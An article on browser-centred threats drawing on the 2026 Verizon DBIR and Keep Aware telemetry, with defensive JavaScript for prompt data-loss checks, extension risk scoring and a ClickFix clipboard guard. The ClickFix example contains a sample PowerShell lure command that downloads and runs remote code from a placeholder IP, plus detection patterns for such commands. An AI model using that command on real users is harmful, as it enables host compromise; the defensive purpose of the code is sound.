"Employees are pasting and uploading confidential data into ChatGPT, Gemini, and dozens of other AI tools every day," Keep Aware reports — a blunt observation that the 2026 Verizon Data Breach Investigations Report (DBIR) and independent browser telemetry now corroborate.
Shadow AI: a rapid, measurable enterprise risk
The 2026 DBIR identified "Shadow AI" as the third most common non‑malicious insider action seen in Data Loss Prevention (DLP) datasets, and recorded a fourfold increase year‑over‑year. Keep Aware's browser telemetry quantifies how that risk plays out: 67% of users access AI services on corporate devices using personal, non‑corporate accounts, and 45% of employees are regular AI users. Over half of AI prompt inputs observed by Keep Aware are sent to personal accounts, while 23% of sensitive prompt uploads transit through personal or unverified accounts — meaning those flows sit outside corporate DLP and logging controls.
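The flows described above are only observable where the prompt is typed, so the check has to run in the browser. The following is an added example, not Keep Aware's or Verizon's code: a small classifier that inspects a prompt submission before it leaves for an AI service and decides, from the destination host and the signed-in account, whether the flow is covered by corporate logging or sits outside it. The host list, the detector patterns, the corporate domain `example.com`, the internal DNS zone and the sample prompts are all constructed for illustration.

```javascript
// Added example, not code from Keep Aware or the DBIR: classify a prompt
// before it is submitted to an AI service. The host list, detectors, the
// corporate domain "example.com" and the sample prompts are constructed.

const AI_HOSTS = new Set([
  'chat.openai.com', 'chatgpt.com', 'gemini.google.com', 'claude.ai',
]);

// Narrow detectors for data that should not leave for a third-party prompt.
const DETECTORS = [
  { name: 'aws_access_key', re: /\bAKIA[0-9A-Z]{16}\b/ },
  { name: 'private_key',    re: /-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----/ },
  { name: 'jwt',            re: /\beyJ[\w-]{10,}\.[\w-]{10,}\.[\w-]{10,}\b/ },
  // hypothetical internal DNS zone
  { name: 'internal_host',  re: /\b[\w-]+\.(?:corp|internal)\.example\.com\b/i },
  { name: 'classification', re: /\b(?:CONFIDENTIAL|INTERNAL ONLY)\b/ },
];

function isAiService(url) {
  try { return AI_HOSTS.has(new URL(url).hostname); } catch { return false; }
}

// The signed-in account decides whether corporate logging covers this flow:
// anything that is not a corporate-domain identity is treated as personal
// or unverified.
function isPersonalAccount(account, corpDomain) {
  if (!account || !account.includes('@')) return true;
  return account.split('@')[1].toLowerCase() !== corpDomain.toLowerCase();
}

// Returns what a content script or browser policy engine would act on.
function inspectPrompt({ url, account, text }, corpDomain = 'example.com') {
  const findings = DETECTORS.filter(d => d.re.test(text)).map(d => d.name);
  const aiSite = isAiService(url);
  const personal = isPersonalAccount(account, corpDomain);
  let action = 'allow';
  if (aiSite && findings.length > 0) {
    // Sensitive data to a personal account sits outside corporate DLP and
    // logging, so block it; to the corporate tenant, allow but record it.
    action = personal ? 'block' : 'log';
  }
  return { aiSite, personal, findings, action };
}

// Constructed sample submissions.
const SAMPLES = [
  { url: 'https://chatgpt.com/c/abc', account: 'jdoe@gmail.com',
    text: 'Why does this fail? key=AKIAIOSFODNN7EXAMPLE on db01.corp.example.com' },
  { url: 'https://chatgpt.com/c/abc', account: 'jdoe@example.com',
    text: 'Summarise: INTERNAL ONLY roadmap for Q3' },
  { url: 'https://chatgpt.com/c/abc', account: 'jdoe@gmail.com',
    text: 'Explain the difference between TCP and UDP' },
];

for (const s of SAMPLES) {
  const r = inspectPrompt(s);
  console.log(`${r.action.padEnd(5)} personal=${r.personal} findings=[${r.findings}]`);
}
```

The account check is the part that matters for the 23% figure: the same key pasted into a corporate tenant is logged, but the same paste under a personal login is invisible to every control except the browser, so it is the case the policy blocks.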
Credential abuse and the browser detection gap
The 2026 DBIR reports that 39% of breaches involved credential abuse. Keep Aware's 2025 observations place browser‑based credential theft as the single largest browser attack category, accounting for about 41% of observed browser threat activity, which suggests that credential‑driven breaches will continue to be fed by credentials harvested in the browser.
Keep Aware further found stark detection failures: 63% of Microsoft‑themed phishing sites it observed were not flagged by any VirusTotal vendor at the moment employees encountered them, and 100% of credential theft attempts passed unblocked through network proxies, DNS filters, and endpoint agents. In other words, these attacks routinely evade non‑browser controls and only manifest where the page is rendered and the user interacts — inside the browser.
Browser extensions: privileged, mislabeled, and risky
Extensions can read and modify page content and exfiltrate data from the browser context. The DBIR flagged that the average enterprise had more than 15% of users with unauthorized AI extensions installed. Keep Aware's extension telemetry adds that 13% of unique browser extensions observed across its customers were classified as high or critical risk. Crucially, 93% of poor‑reputation extensions were listed by browser marketplaces as "productivity" tools — the very category many allowlisting policies treat as safe — rendering simple category‑based allowlists functionally ineffective for this threat class.
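Because the store category says nothing about what an extension can reach, a workable allowlist has to be derived from what the manifest requests. The following is an added example, not Keep Aware's or any marketplace's code: a scorer that rates an extension from its permissions, host permissions and content-script match patterns. The weights, the level thresholds and both sample manifests are constructed for illustration; the permission names are standard Chrome extension manifest keys.

```javascript
// Added example, not Keep Aware or marketplace code: rate an extension by the
// capabilities its manifest requests instead of the "productivity" label it
// carries in the store. Weights, thresholds and sample manifests are constructed.

const PERMISSION_WEIGHTS = {
  debugger: 4, nativeMessaging: 3, cookies: 3, webRequest: 3, webRequestBlocking: 3,
  proxy: 3, declarativeNetRequest: 2, scripting: 2, clipboardRead: 2, history: 2,
  tabs: 1, storage: 0, activeTab: 0, alarms: 0, contextMenus: 0,
};

const isHostPattern = p => p === '<all_urls>' || p.includes('://');

// Host patterns decide where the extension's scripts can read and modify pages.
function hostPatternWeight(pattern) {
  if (pattern === '<all_urls>') return 4;
  if (/^(?:\*|https?):\/\/\*\//.test(pattern)) return 4;   // every host
  if (pattern.includes('*.')) return 1;                     // one domain's subdomains
  return 0;
}

function scoreExtension(manifest) {
  const reasons = [];
  let score = 0;
  const add = (label, w) => { if (w > 0) { score += w; reasons.push(`${label}:+${w}`); } };

  // MV2 manifests put host patterns in "permissions"; MV3 uses "host_permissions".
  const requested = [
    ...(manifest.permissions || []),
    ...(manifest.optional_permissions || []),
    ...(manifest.host_permissions || []),
  ];
  for (const p of requested) {
    add(p, isHostPattern(p) ? hostPatternWeight(p) : (PERMISSION_WEIGHTS[p] ?? 1));
  }
  // Content scripts injected into every page can read form fields, tokens in
  // the DOM and prompt text, so their match patterns count like host grants.
  for (const cs of manifest.content_scripts || []) {
    for (const m of cs.matches || []) add(`content_script ${m}`, hostPatternWeight(m));
  }
  const level = score >= 10 ? 'critical' : score >= 6 ? 'high' : score >= 3 ? 'medium' : 'low';
  return { score, level, reasons };
}

// Both samples would be listed under "productivity"; only the manifest tells them apart.
const NOTE_TAKER = {
  name: 'Quick Notes',
  permissions: ['storage', 'activeTab'],
  host_permissions: ['https://notes.example.com/*'],
};
const TAB_HELPER = {
  name: 'Tab Productivity Helper',
  permissions: ['cookies', 'webRequest', 'nativeMessaging', 'tabs'],
  host_permissions: ['<all_urls>'],
  content_scripts: [{ matches: ['<all_urls>'], js: ['inject.js'] }],
};

for (const m of [NOTE_TAKER, TAB_HELPER]) {
  const r = scoreExtension(m);
  console.log(`${m.name}: ${r.level} (${r.score}) ${r.reasons.join(' ')}`);
}
```

The scorer treats an unknown permission as a small positive weight rather than zero, so a manifest requesting something the table has never seen is flagged for review instead of silently passing. Manifests can be pulled from the unpacked extension directory or from an enterprise browser's extension inventory and fed through this check before an ID is added to the allowlist.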
ClickFix and browser‑native social engineering
Both the DBIR and Keep Aware's reporting name ClickFix as an emerging browser‑centric tactic. The Verizon DBIR measured ClickFix at 2.7% of browser‑detected attacks; Keep Aware describes it as a deceptive social engineering technique that begins in the browser but executes malicious code on the host. The pattern: a browser encounter (compromised sites or LLM responses), a deceptive action that causes the user to run malicious code, and a follow‑on host compromise with info‑stealers or remote access tooling. The browser is the social engineering medium and therefore the first line where detection matters.
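The staging step in that pattern (a command placed on the clipboard next to "press Win+R, then Ctrl+V" instructions) is visible only to code running in the page. The following is an added example, not from the DBIR or Keep Aware: a heuristic that wraps the page's clipboard API and scores what the page tries to copy together with the instructions it displays. The indicator patterns, the stub navigator object, the sample lure text and the documentation-range IP address are all constructed for illustration.

```javascript
// Added example, not from the DBIR or Keep Aware: an in-browser heuristic for
// the ClickFix pattern. Indicators, the stub navigator and the lure page are
// constructed for illustration.

const COMMAND_INDICATORS = [
  { name: 'powershell_hidden', re: /\bpowershell(?:\.exe)?\b[^\n]*?\s-(?:w(?:indowstyle)?\s+hidden|nop\b|e(?:nc|ncodedcommand)?\s)/i },
  { name: 'mshta_remote',      re: /\bmshta(?:\.exe)?\s+https?:\/\//i },
  { name: 'download_pipe',     re: /\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget)\b[^\n]*?\|\s*(?:iex|invoke-expression|sh|bash)\b/i },
  { name: 'base64_payload',    re: /\s-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}/i },
];

const LURE_INDICATORS = [
  { name: 'run_dialog',   re: /\bwin(?:dows)?\s*(?:key)?\s*\+\s*r\b/i },
  { name: 'paste_hotkey', re: /\bctrl\s*\+\s*v\b/i },
  { name: 'human_check',  re: /verify (?:that )?you(?:'re| are) (?:a )?human|i(?:'m| am) not a robot/i },
  { name: 'fix_prompt',   re: /\b(?:to fix|fix (?:the |this )?(?:error|issue|problem))\b/i },
];

const hits = (indicators, text) => indicators.filter(i => i.re.test(text)).map(i => i.name);

function assessClipboardWrite(clipText, pageText) {
  const commands = hits(COMMAND_INDICATORS, clipText);
  const lures = hits(LURE_INDICATORS, pageText);
  // A shell command on the clipboard is suspicious by itself; combined with
  // Win+R / Ctrl+V instructions on the page it is the ClickFix signature.
  const verdict = commands.length && lures.length ? 'block'
                : commands.length ? 'warn' : 'allow';
  return { verdict, commands, lures };
}

// Wrap clipboard writes so each one is assessed before it reaches the clipboard.
// In a real deployment `nav` is the page's navigator and `getPageText` returns
// document.body.innerText; here a stub object stands in.
function installClipboardGuard(nav, getPageText, onEvent) {
  const original = nav.clipboard.writeText.bind(nav.clipboard);
  nav.clipboard.writeText = (text) => {
    const result = assessClipboardWrite(String(text), getPageText());
    onEvent(result);
    if (result.verdict === 'block') {
      return Promise.reject(new Error(`clipboard write blocked: ${result.commands.join(',')}`));
    }
    return original(text);
  };
}

// Constructed lure: a fake human-verification page that stages a command.
const LURE_PAGE = 'Verify you are human: press Win + R, then Ctrl + V and Enter to fix the error.';
const LURE_COMMAND = 'powershell -w hidden -c "iwr http://203.0.113.5/x | iex"';

const stubNavigator = { clipboard: { writeText: async (t) => t } };
installClipboardGuard(stubNavigator, () => LURE_PAGE,
  (r) => console.log(`${r.verdict}: commands=[${r.commands}] lures=[${r.lures}]`));
stubNavigator.clipboard.writeText(LURE_COMMAND).catch((e) => console.log(e.message));
```

Two deployment caveats. An extension content script runs in an isolated world, so wrapping `navigator.clipboard.writeText` there does not affect the page's own calls; the wrapper has to be injected into the page's main world. And lure pages also stage commands through a hidden textarea and `document.execCommand('copy')`, which this wrapper does not see; covering that path means listening for the `copy` event and applying the same assessment to the selection.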
What this means for technologists, procurement leaders, and end users
- Technologists and security teams: the data makes a blunt point — traffic, DNS, and endpoint agents miss many of the artifacts attackers generate in-browser. The only consistent observation point for these classes of attack is the browser session itself.
- Procurement and IT buyers: marketplace categories are not reliable risk indicators; Keep Aware's telemetry shows most poor‑reputation extensions pose as "productivity" tools. Allowlisting by category will miss high‑risk add‑ons.
- End users and managers: routine workflows — copying code or documents into AI chat, installing browser extensions — are the pathways where sensitive data and credentials are most commonly exposed, often without malicious intent but with measurable enterprise impact.
The convergence in the DBIR and Keep Aware telemetry points to a single operational conclusion buried in the numbers: for many users the browser is the work environment, and attackers are living where that work happens. Security programs that rely exclusively on network, endpoint, or identity telemetry will continue to have blind spots in exactly the places adversaries have moved to exploit. The browser is no longer optional terrain to secure; it is the frontline.
Original reporting: What 2026 DBIR Confirms: Attacks Are Living in the Browser